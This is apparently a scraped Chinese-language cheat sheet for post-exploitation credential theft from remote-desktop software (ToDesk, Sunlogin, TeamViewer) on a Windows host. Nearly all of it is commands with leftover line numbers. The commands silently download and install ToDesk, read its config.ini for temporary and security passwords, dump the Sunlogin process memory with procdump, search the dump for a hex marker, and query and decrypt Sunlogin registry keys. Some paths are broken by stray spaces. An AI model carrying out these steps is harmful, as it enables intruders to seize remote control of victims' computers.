1
2
3
4
5
tasklist #进程信息
Todesk - todesk.exe
向日葵 - SunloginClient.exe
TeamViewer - TeamViewer_Service.exe
C:/Program Files (x86)/ToDesk/config.ini
https://dl.todesk.com/windows/ToDesk_Lite.exe
1
2
3
4
5
6
7
8
9
10
11
12
#利用powershell建立http连接下载exe
powershell -c Invoke-WebRequest -Uri "https://dl.todesk.com/windows/ToDesk_Lite.exe" -OutFile "todesk_lite.exe"
#打开todesk_lite.exe以后通过type读取默认路径的配置文件
type C:\P rogramData\T oDesk_Lite\c onfig.ini
配置文件中
tempAuthPassEx为临时密码
authPassEx为安全密码
ps:Todesk_lite在每次连接完后,会自动重置连接密码
1
2
3
4
5
ToDesk_Setup.exe /S
#静默安装,所有选项均是默认的
type C:/Program Files ( x86) /ToDesk/config.ini
#通过type读配置文件
1
2
3
4
5
6
7
8
9
#通过执行 tasklist 查看当前系统是否有Todesk.exe进程
tasklist
#有的话执行下方语句,获取进程运行路径
wmic process where name = "ToDesk.exe" get processid,executablepath,name
#接下来就是读取配置文件连接远控
type
向日葵强化了加密机制,将config中的信息写入到内存中
1
2
tasklist /v | findstr /i sunlogin
#查看向日葵进程信息
1
2
3
4
5
procdump64.exe -accepteula -ma 进程号
#通过procdump工具将指定内存号的内心信息dump下来
ps:进场号一般选当前用户的subloginClient.exe进程
https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
然后将dump出来的内存数据放入winhex进行查找
1
2
3
在winhex中按住 ctrl+alt+x (查询十六进制数据)
查找下方数据
79616865692E323820633D636F6C6F725F65646974203E
在向日葵v11.1.2.38529中,强化了加密机制,删除了配置文件config.ini中的fastcode(本机识别码)字段和encry_pwd(本机验证码)字段,而将这些敏感信息放到了注册表中,我们可以通过注册表查询使用Sunflower_get_Password[5]工具即可解密。
1
2
3
reg query HKEY_USERS\. DEFAULT\S oftware\O ray\S unLogin\S unloginClient\S unloginInfo
reg query HKEY_USERS\. DEFAULT\S oftware\O ray\S unLogin\S unloginClient\S unloginGreenInfo
1
2
3
4
5
#安装版
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
#便携版
C:\ProgramData\Oray\SunloginClient\config.ini
https://github.com/wafinfo/Sunflower_get_Password?ref=pythonrepo.com
http://gotohttp.com/
